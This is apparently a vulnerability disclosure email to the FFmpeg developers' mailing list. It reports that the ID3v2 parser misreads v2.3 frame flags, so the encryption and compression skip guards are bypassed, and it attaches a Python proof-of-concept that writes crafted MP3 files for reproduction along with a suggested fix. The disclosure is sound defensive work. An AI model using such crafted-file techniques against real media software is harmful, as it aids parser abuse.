Hi,

I found a flag parsing bug in FFmpeg's ID3v2 demuxer where frame flags
for all tag versions are interpreted using ID3v2.4 bit positions,
including for ID3v2.3 tags. This causes the encryption and compression
skip guards to be silently bypassed for v2.3 frames.

Affected file: libavformat/id3v2.c
FFmpeg version: N-123228-g0ddece40c5


== Root Cause ==

The flag constants in id3v2.h are defined using ID3v2.4 frame flag bit
positions:

  ID3v2_FLAG_DATALEN     0x0001  (v2.4: byte9 bit0)
  ID3v2_FLAG_UNSYNCH     0x0002  (v2.4: byte9 bit1)
  ID3v2_FLAG_ENCRYPTION  0x0004  (v2.4: byte9 bit2)
  ID3v2_FLAG_COMPRESSION 0x0008  (v2.4: byte9 bit3)

The frame parsing code in id3v2_parse() applies these constants to all
versions unconditionally:

  L936: tflags  = avio_rb16(pb);
  L937: tunsync = tflags & ID3v2_FLAG_UNSYNCH;
  ...
  L960: if (tflags & ID3v2_FLAG_DATALEN) { ... }
  L968: tcomp = tflags & ID3v2_FLAG_COMPRESSION;
  L969: tencr = tflags & ID3v2_FLAG_ENCRYPTION;
  L972: if (tencr || (!CONFIG_ZLIB && tcomp)) { /* skip */ }

But in ID3v2.3 (id3.org/id3v2.3.0), the second byte of the two-byte
frame flags field uses different bit positions:

  bit7 = compression  (0x80)
  bit6 = encryption   (0x40)
  bit5 = grouping     (0x20)
  bits 4-0 = reserved (must be zero per spec)

Because 0x0040 & 0x0004 == 0 and 0x0080 & 0x0008 == 0, the checks at
L968-969 never fire for v2.3 frames, and the skip guard at L972 is
never taken.
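
The mask mismatch can be checked in isolation. The following is a minimal Python sketch, not FFmpeg code: the two ID3v2_FLAG_* values are the ones quoted above, while V23_ENCRYPTION, V23_COMPRESSION and v24_style_check() are illustrative names introduced here.

```python
# v2.4 frame-flag masks, as quoted above from id3v2.h.
ID3v2_FLAG_ENCRYPTION = 0x0004
ID3v2_FLAG_COMPRESSION = 0x0008

# v2.3 bit positions from the layout above (names are illustrative only).
V23_ENCRYPTION = 0x0040
V23_COMPRESSION = 0x0080


def v24_style_check(tflags):
    """Mimic the unconditional checks and return (tencr, tcomp)."""
    return tflags & ID3v2_FLAG_ENCRYPTION, tflags & ID3v2_FLAG_COMPRESSION


for name, flags in [("encrypted", V23_ENCRYPTION), ("compressed", V23_COMPRESSION)]:
    tencr, tcomp = v24_style_check(flags)
    # Both values stay 0, so a guard of the form `if tencr or tcomp` is not taken.
    print(f"v2.3 {name} frame (0x{flags:04x}): tencr={tencr} tcomp={tcomp}")
```

Conversely, v24_style_check(0x0009) returns a non-zero tcomp even though both bits are reserved in v2.3.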


== Confirmed Behaviors ==

All confirmed on an ASan+UBSan build (N-123228-g0ddece40c5). No memory
safety errors were observed; the avio layer bounds all reads correctly.
These are logic/correctness bugs.

1. Encryption skip bypass

A v2.3 GEOB frame with the encryption flag (byte9 = 0x40) set is not
caught by the tencr check at L969. The frame reaches read_geobtag()
instead of the skip path. The encrypted data is parsed as GEOB fields
(encoding, MIME, filename, description), causing a parse failure on the
garbage content:

  id3v2 ver:3 flags:00 len:302
  Incorrect BOM value: 0x6170
  Error reading frame GEOB, skipped

Note: the "skipped" message here comes from read_geobtag() failing
mid-parse, not from the security skip guard at L972. With crafted
content mimicking valid GEOB field boundaries, the frame would be
parsed and stored silently.

2. Compression skip bypass

A v2.3 GEOB frame with the compression flag (byte9 = 0x80) set
produces no diagnostic output — clean exit, no error:

  id3v2 ver:3 flags:00 len:62
  [no GEOB messages]

The 4-byte decompressed-size prefix (present in all v2.3 compressed
frames) is silently consumed as raw GEOB fields: the first byte becomes
the encoding field, subsequent bytes become the start of the MIME
string. The rest of the compressed payload is then parsed as frame
content without any indication something went wrong.
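
To illustrate how the size prefix lands in the GEOB layout, here is a small Python sketch. It only models the first two bytes; misread_prefix() is a hypothetical helper, and 543 is just an example decompressed size.

```python
import struct


def misread_prefix(decompressed_size):
    """Show which GEOB fields the first two prefix bytes are taken for."""
    prefix = struct.pack(">I", decompressed_size)  # big-endian 32-bit size
    encoding_byte = prefix[0]    # consumed as the GEOB text-encoding byte
    mime_first_byte = prefix[1]  # first byte of the NUL-terminated MIME string
    return prefix, encoding_byte, mime_first_byte


prefix, enc, mime0 = misread_prefix(543)
print(prefix.hex(), enc, mime0)  # prints: 0000021f 0 0
```

For any size below 2**24 the encoding byte is 0x00, and for any size below 2**16 the MIME string starts with a NUL, so it is read as empty.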

3. False zlib decompression on v2.3 frames

Setting bits 0x09 on a v2.3 frame — reserved bits that must be zero
per v2.3 spec, but matching v2.4 DATA_LEN(0x01)|COMPRESSION(0x08) —
triggers FFmpeg to read 4 bytes as a decompressed-size indicator and
attempt zlib decompression on the remaining data. Confirmed:

  id3v2 ver:3 flags:00 len:99
  Compressed frame GEOB tlen=85 dlen=483

Decompression succeeded and the output was parsed as GEOB content.
This is the clearest proof that FFmpeg applies v2.4 flag semantics to
v2.3 frames without any version check.
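
The path taken here can be modelled roughly as follows. This is a simplified Python sketch of the behaviour described above, not the FFmpeg implementation; decode_like_v24() and the sample payload are assumptions made for illustration.

```python
import struct
import zlib

# v2.4 masks, as quoted from id3v2.h.
ID3v2_FLAG_DATALEN = 0x0001
ID3v2_FLAG_COMPRESSION = 0x0008


def decode_like_v24(tflags, payload):
    """Apply v2.4 DATA_LEN/COMPRESSION handling regardless of tag version."""
    dlen = None
    if tflags & ID3v2_FLAG_DATALEN:
        (dlen,) = struct.unpack(">I", payload[:4])  # 4-byte size indicator
        payload = payload[4:]
    if tflags & ID3v2_FLAG_COMPRESSION:
        payload = zlib.decompress(payload)
    return dlen, payload


body = b"\x00text/plain\x00notes.txt\x00User notes\x00" + b"x" * 40
frame_data = struct.pack(">I", len(body)) + zlib.compress(body)

# 0x0009 is reserved in v2.3 but selects DATA_LEN|COMPRESSION under v2.4 rules.
dlen, out = decode_like_v24(0x0009, frame_data)
print(dlen == len(body), out == body)
```

With the genuine v2.3 compression flag (0x0080) the same function leaves the payload untouched, which is the behaviour described under item 2.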

4. False unsync processing on v2.3 frames

Setting bit 0x02 on a v2.3 frame (reserved in v2.3, matching v2.4
UNSYNCH) triggers unsynchronisation removal: all 0xFF 0x00 byte pairs
in the frame are collapsed to 0xFF before the data reaches
read_geobtag(). This corrupts frame data that was never unsynchronised.
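
The effect on data that was never unsynchronised can be seen with a small Python sketch. remove_unsync() is a simplified stand-in written for this mail, not the FFmpeg routine.

```python
def remove_unsync(data):
    """Drop the 0x00 byte that directly follows each 0xFF."""
    out = bytearray()
    i = 0
    while i < len(data):
        out.append(data[i])
        if data[i] == 0xFF and i + 1 < len(data) and data[i + 1] == 0x00:
            i += 1  # skip the zero byte after 0xFF
        i += 1
    return bytes(out)


raw = b"\x42\xff\x00\x10\xff\x00\xff\xe0"  # payload that legitimately contains FF 00
print(remove_unsync(raw).hex())  # prints: 42ff10ffffe0
```

Two bytes of genuine payload are lost here, so every field offset after the first FF 00 pair shifts.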


== Suggested Fix ==

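The flag parsing should be version-aware. The tag version is already
available at the call site. The DATA_LEN check at L960 needs the same
gating, since in v2.3 a 4-byte decompressed size is present only when
the compression flag is set. A sketch of the flag decoding: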

  if (version == 3) {
      tcomp   = tflags & 0x0080;
      tencr   = tflags & 0x0040;
      tunsync = 0;  /* v2.3 uses only the global tag-level unsync flag */
      /* DATA_LEN field does not exist in v2.3 */
  } else { /* version == 4 */
      tcomp   = tflags & ID3v2_FLAG_COMPRESSION;
      tencr   = tflags & ID3v2_FLAG_ENCRYPTION;
      tunsync = tflags & ID3v2_FLAG_UNSYNCH;
  }
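
For quick checking of the intended truth table, the same decision logic can be written as a Python model. This is only a sketch under the assumptions stated in this mail; FrameFlags and decode_frame_flags() are hypothetical names, and has_datalen for v2.3 follows the spec rule that the decompressed size accompanies the compression flag.

```python
from typing import NamedTuple


class FrameFlags(NamedTuple):
    compressed: bool
    encrypted: bool
    unsync: bool
    has_datalen: bool


def decode_frame_flags(version, tflags):
    """Decode the frame flags using the layout of the given tag version."""
    if version == 3:
        compressed = bool(tflags & 0x0080)
        # v2.3 has no per-frame unsync bit; a size prefix exists only if compressed.
        return FrameFlags(compressed, bool(tflags & 0x0040), False, compressed)
    if version == 4:
        return FrameFlags(
            compressed=bool(tflags & 0x0008),
            encrypted=bool(tflags & 0x0004),
            unsync=bool(tflags & 0x0002),
            has_datalen=bool(tflags & 0x0001),
        )
    raise ValueError(f"unsupported ID3v2 version: {version}")


print(decode_frame_flags(3, 0x0040))  # encrypted is True, so the frame gets skipped
print(decode_frame_flags(3, 0x0009))  # reserved bits are ignored for v2.3
```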


== Reproduction ==

PoC script attached (poc_id3.py). It writes five MP3 files to /tmp:

  python3 poc_id3.py

  # Encryption skip bypass (frame reaches parser, not skip guard):
  ffmpeg -v debug -i /tmp/poc_id3.mp3 -f null - 2>&1
  # Expected: 'Incorrect BOM value' + 'Error reading frame GEOB, skipped'

  # False zlib decompression (strongest proof):
  ffmpeg -v debug -i /tmp/poc_false_zlib.mp3 -f null - 2>&1
  # Expected: 'Compressed frame GEOB tlen=NN dlen=NNN'

  # Compression bypass (silent — no error emitted):
  ffmpeg -v debug -i /tmp/poc_comp_bypass.mp3 -f null - 2>&1
  # Expected: no GEOB messages, clean exit

Tested on Ubuntu 22.04, gcc 11, N-123228-g0ddece40c5.

Thanks,
Guanni Qu
#!/usr/bin/env python3
"""
PoC: ID3v2.3/v2.4 Flag Confusion in FFmpeg's GEOB Parser (read_geobtag)
File: libavformat/id3v2.c, function read_geobtag() ~line 477

Root Cause
==========
FFmpeg uses ID3v2.4 flag bit positions (defined in id3v2.h) for ALL
ID3v2 versions, including v2.3. The flag constants are:

  ID3v2_FLAG_DATALEN     0x0001  (v2.4 byte9 bit0)
  ID3v2_FLAG_UNSYNCH     0x0002  (v2.4 byte9 bit1)
  ID3v2_FLAG_ENCRYPTION  0x0004  (v2.4 byte9 bit2)
  ID3v2_FLAG_COMPRESSION 0x0008  (v2.4 byte9 bit3)

But in ID3v2.3 the frame flag layout (byte 9 of 2-byte flags) is:
  bit7 = compression  (0x80)
  bit6 = encryption   (0x40)
  bit5 = grouping     (0x20)

Consequences:
1. v2.3 compression (0x80) NOT detected -> compressed data parsed raw
2. v2.3 encryption  (0x40) NOT detected -> encrypted frames not skipped
3. v2.4-only bits (0x01, 0x02, 0x08) falsely trigger on v2.3 frames

The encryption skip logic at ~L972 is completely bypassed for v2.3:
  tencr = tflags & ID3v2_FLAG_ENCRYPTION;  // checks 0x0004
  // But v2.3 encryption is 0x0040 - never detected!
  if (tencr || (!CONFIG_ZLIB && tcomp)) { ... skip ... }

This causes read_geobtag to attempt parsing attacker-controlled
encrypted or compressed data as GEOB content (encoding, MIME type,
filename, description as null-terminated strings, then binary data).

Demonstrated Behaviors
======================
1. Encrypted frame bypass: GEOB with v2.3 encryption flag (0x0040)
   is NOT caught by the skip guard at L972; the frame reaches
   read_geobtag() which fails mid-parse on the garbage content.
   With crafted data mimicking valid GEOB field boundaries, the frame
   would be parsed silently.
2. Compressed frame bypass: GEOB with v2.3 compression flag (0x0080)
   has its 4-byte decompressed-size header parsed as GEOB encoding+MIME.
   No error is emitted; the compressed payload is silently consumed.
3. False zlib decompression: v2.4 DATA_LEN(0x01)+COMPRESSION(0x08)
   flags on v2.3 frame trigger zlib decompression path that shouldn't
   exist for v2.3. Confirmed: 'Compressed frame GEOB tlen=85 dlen=483'
   appears in debug output; decompressed data is parsed as GEOB content.
4. False unsync: v2.4 UNSYNCH(0x02) on v2.3 frame triggers unsync
   buffer processing, corrupting frame data not meant to be unsync'd.
"""

import os
import struct
import zlib

OUTPUT_DIR = os.path.dirname(os.path.abspath(__file__))
PRIMARY_OUTPUT = "/tmp/poc_id3.mp3"


def syncsafe(n):
    """Encode integer as 4-byte ID3v2 syncsafe integer."""
    out = bytearray(4)
    for i in range(3, -1, -1):
        out[i] = n & 0x7F
        n >>= 7
    return bytes(out)


def mp3_frames(count=3):
    """Generate minimal valid MPEG1 Layer3 128kbps 44100Hz frames."""
    # Header: 0xFFFB9004 = MPEG1 Layer3 128kbps 44100Hz stereo
    header = b'\xff\xfb\x90\x04'
    frame = header + b'\x00' * (417 - 4)
    return frame * count


def make_frame(tag, data, flags=0x0000):
    """Build an ID3v2.3/v2.4 frame (10-byte header + data)."""
    tag_bytes = tag.encode('ascii') if isinstance(tag, str) else tag
    size = struct.pack('>I', len(data))
    fl = struct.pack('>H', flags)
    return tag_bytes + size + fl + data


def make_id3v2_tag(frames, version=3, global_flags=0x00):
    """Build the 10-byte ID3v2 tag header for `frames` (the frames themselves are not included)."""
    header = b'ID3'
    ver = bytes([version, 0x00])
    return header + ver + bytes([global_flags]) + syncsafe(len(frames))


# ---------------------------------------------------------------------------
# PoC variant 1: v2.3 encryption bypass + false DATA_LEN + false UNSYNC
# ---------------------------------------------------------------------------
def build_poc_v1():
    """
    v2.3 GEOB frame with flags = 0x0043:
      0x40 = v2.3 encryption (FFmpeg misses this -> skip guard at L972 not taken)
      0x02 = v2.4 UNSYNC    (FFmpeg falsely activates -> unsync buffer processing)
      0x01 = v2.4 DATA_LEN  (FFmpeg falsely activates -> 4 bytes consumed as dlen)

    The frame reaches read_geobtag() instead of the skip path at L972.
    FFmpeg additionally applies DATA_LEN and UNSYNC processing before
    handing the data to read_geobtag(). The encrypted garbage causes a
    mid-parse failure ('Incorrect BOM value', 'Error reading frame GEOB,
    skipped'). That 'skipped' message comes from read_geobtag() failing,
    NOT from the security skip guard. With crafted data mimicking valid
    GEOB field boundaries (correct encoding byte, null-terminated MIME,
    filename, description), the frame would be parsed and its content
    stored silently.
    """
    # Simulated encrypted frame data
    # In v2.3 encrypted frames: 1 byte method ID + encrypted content
    encryption_method = b'\x01'

    # Build frame data: first 4 bytes consumed by false DATA_LEN
    fake_dlen = struct.pack('>I', 0x00000100)

    # Rest: encrypted content with 0xFF 0x00 sequences (affected by unsync)
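    inner = encryption_method  # first byte after dlen: read as the GEOB encoding (0x01 = UTF-16 with BOM)
    inner += b'\x00'  # read as an empty, NUL-terminated MIME string
    inner += b'application/x-poc'  # "ap" is then read as the filename BOM (the 0x6170 in the log)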
    inner += b'\xff\x00' * 20  # collapsed by unsync processing
    inner += b'\x00'  # null terminator for MIME after unsync
    inner += b'exploit.bin\x00'  # filename
    inner += b'PoC description\x00'  # description
    inner += b'\xDE\xAD\xBE\xEF' * 50  # binary payload

    frame_data = fake_dlen + inner
    frame = make_frame('GEOB', frame_data, 0x0043)
    hdr = make_id3v2_tag(frame, version=3)
    return hdr + frame + mp3_frames()


# ---------------------------------------------------------------------------
# PoC variant 2: v2.3 compression flag bypass
# ---------------------------------------------------------------------------
def build_poc_v2():
    """
    v2.3 GEOB with compression flag = 0x0080.
    FFmpeg checks 0x0008 (v2.4 position) -> misses compression.
    The 4-byte decompressed-size prefix is parsed as GEOB content:
      Byte 0 = encoding (0x00 = ISO-8859-1 whenever decomp size < 2**24)
      Byte 1 = first byte of MIME string
    No error is emitted; compressed payload silently consumed as frame data.
    """
    # Valid GEOB content that gets compressed
    geob = b'\x00'  # encoding
    geob += b'audio/mpeg\x00'
    geob += b'track.mp3\x00'
    geob += b'Embedded audio track\x00'
    geob += b'\x00' * 500  # binary data

    compressed = zlib.compress(geob, 9)
    decomp_size = struct.pack('>I', len(geob))

    # v2.3 format: [4-byte decomp size][compressed data]
    frame_data = decomp_size + compressed
    frame = make_frame('GEOB', frame_data, 0x0080)
    hdr = make_id3v2_tag(frame, version=3)
    return hdr + frame + mp3_frames()


# ---------------------------------------------------------------------------
# PoC variant 3: False zlib decompression on v2.3 frame
# ---------------------------------------------------------------------------
def build_poc_v3():
    """
    v2.3 frame with flags = 0x0009 (bits reserved in v2.3, but matching
    v2.4 DATA_LEN(0x01) + COMPRESSION(0x08)). FFmpeg applies v2.4 semantics:
    - Reads 4 bytes as dlen (decompressed size indicator)
    - Triggers zlib decompression on remaining frame data
    - Decompressed output passed to read_geobtag() as GEOB content

    Confirmed by debug output:
      'Compressed frame GEOB tlen=85 dlen=483'
    Decompression succeeds and result is parsed as GEOB. This is the
    strongest concrete proof: FFmpeg applied v2.4 decompression logic
    to a v2.3 frame where those flag bits must be zero per spec.
    """
    geob = b'\x00'  # encoding
    geob += b'text/plain\x00'
    geob += b'notes.txt\x00'
    geob += b'User notes\x00'
    geob += b'The quick brown fox jumps over the lazy dog. ' * 10

    compressed = zlib.compress(geob)
    dlen_bytes = struct.pack('>I', len(geob))

    frame_data = dlen_bytes + compressed
    frame = make_frame('GEOB', frame_data, 0x0009)
    hdr = make_id3v2_tag(frame, version=3)
    return hdr + frame + mp3_frames()


# ---------------------------------------------------------------------------
# PoC variant 4: Combined encryption + compression bypass
# ---------------------------------------------------------------------------
def build_poc_v4():
    """
    v2.3 GEOB with both encryption (0x40) and compression (0x80) flags.
    FFmpeg detects NEITHER:
      tencr = 0x00C0 & 0x0004 = 0  (v2.3 encryption missed)
      tcomp = 0x00C0 & 0x0008 = 0  (v2.3 compression missed)

    Frame should be skipped entirely but is parsed as raw GEOB.
    Data starts with 4-byte decomp size + 1-byte encryption method +
    encrypted compressed content, all misinterpreted as GEOB fields.
    No error emitted; frame silently processed.
    """
    decomp_size = struct.pack('>I', 0x00001000)
    enc_method = b'\x03'
    enc_data = bytes(range(1, 201))  # simulated encrypted+compressed data

    frame_data = decomp_size + enc_method + enc_data
    frame = make_frame('GEOB', frame_data, 0x00C0)
    hdr = make_id3v2_tag(frame, version=3)
    return hdr + frame + mp3_frames()


# ---------------------------------------------------------------------------
# PoC variant 5: All confusion vectors in one file
# ---------------------------------------------------------------------------
def build_poc_combined():
    """Multiple GEOB frames each exploiting different flag confusions."""
    frames = b''

    # Frame A: v2.3 encryption bypass (0x0040 not detected)
    geob_a = b'\x00' + b'text/plain\x00' + b'a.txt\x00' + b'A\x00' + b'A' * 50
    frames += make_frame('GEOB', geob_a, 0x0040)

    # Frame B: False DATA_LEN (0x0001 on v2.3)
    dlen_b = struct.pack('>I', 100)
    geob_b = dlen_b + b'\x00' + b'app/bin\x00' + b'b.bin\x00' + b'B\x00' + b'B' * 80
    frames += make_frame('GEOB', geob_b, 0x0001)

    # Frame C: False UNSYNC (0x0002 on v2.3) with 0xFF 0x00 pairs
    geob_c = b'\x00' + b'img/png\x00' + b'c.png\x00' + b'C\x00'
    geob_c += b'\xff\x00' * 30 + b'\x42' * 20
    frames += make_frame('GEOB', geob_c, 0x0002)

    # Frame D: v2.3 compression bypass (0x0080 not detected)
    decomp_d = struct.pack('>I', 500) + b'\x43' * 100
    frames += make_frame('GEOB', decomp_d, 0x0080)

    # Frame E: v2.3 encryption+compression bypass (0x00C0)
    enc_comp_e = struct.pack('>I', 200) + b'\x01' + b'\x44' * 80
    frames += make_frame('GEOB', enc_comp_e, 0x00C0)

    # Frame F: False zlib on v2.3 (DATA_LEN 0x01 + COMPRESSION 0x08)
    geob_f = b'\x00' + b'a/b\x00' + b'f\x00' + b'd\x00' + b'Z' * 300
    compressed_f = zlib.compress(geob_f)
    dlen_f = struct.pack('>I', len(geob_f))
    frames += make_frame('GEOB', dlen_f + compressed_f, 0x0009)

    hdr = make_id3v2_tag(frames, version=3)
    return hdr + frames + mp3_frames()


def main():
    # All variants are written next to PRIMARY_OUTPUT (under /tmp).
    os.makedirs(os.path.dirname(PRIMARY_OUTPUT), exist_ok=True)

    variants = [
        (PRIMARY_OUTPUT, build_poc_v1, "v2.3 encryption bypass + false DATA_LEN/UNSYNC"),
        ("/tmp/poc_comp_bypass.mp3", build_poc_v2, "v2.3 compression flag bypass (silent)"),
        ("/tmp/poc_false_zlib.mp3", build_poc_v3, "False zlib decompression on v2.3 (confirmed)"),
        ("/tmp/poc_enc_comp.mp3", build_poc_v4, "v2.3 encryption+compression bypass (silent)"),
        ("/tmp/poc_all_flags.mp3", build_poc_combined, "All flag confusion vectors"),
    ]

    for path, builder, desc in variants:
        data = builder()
        with open(path, 'wb') as f:
            f.write(data)
        print(f"[+] {os.path.basename(path):25s} {len(data):5d} bytes - {desc}")

    print(f"\n[*] Primary PoC: {PRIMARY_OUTPUT}")
    print()
    print("[*] Test commands:")
    print()
    print("    # Encryption skip bypass (frame reaches parser, not skip guard):")
    print(f"    ffmpeg -v debug -i {PRIMARY_OUTPUT} -f null - 2>&1")
    print("    # Expected: 'Incorrect BOM value' / 'Error reading frame GEOB, skipped'")
    print()
    print("    # False zlib decompression (strongest concrete proof):")
    print("    ffmpeg -v debug -i /tmp/poc_false_zlib.mp3 -f null - 2>&1")
    print("    # Expected: 'Compressed frame GEOB tlen=NN dlen=NNN'")
    print()
    print("    # Compression bypass (silent — no error emitted):")
    print("    ffmpeg -v debug -i /tmp/poc_comp_bypass.mp3 -f null - 2>&1")
    print("    # Expected: no GEOB messages, clean exit")


if __name__ == '__main__':
    main()
_______________________________________________
ffmpeg-devel mailing list -- [email protected]